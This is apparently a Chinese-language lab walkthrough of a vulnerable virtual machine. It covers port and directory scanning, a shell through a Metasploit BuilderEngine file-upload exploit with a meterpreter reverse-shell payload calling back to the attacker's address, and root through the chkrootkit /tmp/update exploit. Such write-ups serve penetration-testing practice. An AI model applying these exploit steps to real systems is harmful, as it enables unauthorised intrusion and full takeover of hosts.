# 靶场搭建
下载靶机,直接导入,开启 NAT 模式就 OK
IP: 192.168.1.131
# 信息初收集
端口开放:
22/tcp open ssh | |
53/tcp open domain | |
80/tcp open http | |
110/tcp open pop3 | |
111/tcp open rpcbind | |
139/tcp open netbios-ssn | |
143/tcp open imap | |
445/tcp open microsoft-ds | |
993/tcp open imaps | |
995/tcp open pop3s | |
8080/tcp open http-proxy | |
46322/tcp open unknown |
目录收集
[02:38:38] 301 - 314B - /blocks -> http://192.168.1.131/blocks/
[02:38:41] 200 - 392B - /codeception.yml
[02:38:50] 301 - 313B - /files -> http://192.168.1.131/files/
[02:38:50] 200 - 522B - /files/
[02:38:59] 200 - 706B - /license.txt
[02:39:05] 301 - 315B - /modules -> http://192.168.1.131/modules/
[02:39:05] 200 - 538B - /modules/
[02:39:18] 200 - 36B - /robots.txt
[02:39:19] 403 - 293B - /server-status
[02:39:19] 403 - 294B - /server-status/
[02:39:26] 301 - 314B - /system -> http://192.168.1.131/system/
[02:39:26] 200 - 120B - /system/
[02:39:27] 301 - 314B - /themes -> http://192.168.1.131/themes/
[02:39:27] 200 - 503B - /themes/
+ /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Server may leak inodes via ETags, header found with file /, inode: 65, size: 53fb059bb5bc8, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS .
+ /files/: Directory indexing found.
+ /files/: This might be interesting.
+ /system/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /license.txt: License file found may identify site software.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
服务详细识别:
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
995/tcp open ssl/pop3 Dovecot pop3d
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
46322/tcp open status 1 (RPC #100024)
通过 themes 的信息收集,找到他的主题是 Default 2015 Theme for BuilderEngine V3.
在 metasploit 中搜索这个主题发现有漏洞的,我们直接利用
# 渗透过程
# builderengine 拿 shell
利用 metasploit 中的模块拿到 shell
msf6 exploit(multi/http/builderengine_upload_exec) > show options
Module options (exploit/multi/http/builderengine_upload_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.131 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
cs/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to BuilderEngine
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.129 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 BuilderEngine 3.5.0
View the full module info with the info, or info -d command.
# 提权
查看运行的程序,看到 chkrootkit 程序,通过使用 metasploit 中相关模块,进行提权
msf6 exploit(unix/local/chkrootkit) > show options
Module options (exploit/unix/local/chkrootkit):
Name Current Setting Required Description
---- --------------- -------- -----------
CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit
SESSION 1 yes The session to run this module on
Payload options (cmd/unix/python/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.129 yes The listen address (an interface may be specified)
LPORT 7777 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
run 起来之后等待执行反弹 shell 即可。
# 小结
chkrootkit 漏洞利用原理在这里: https://www.exploit-db.com/exploits/33899
定时执行 /tmp/update ,把命令写入这里,按照 chkrootkit 的用户权限执行。直接拿到 root 权限的。
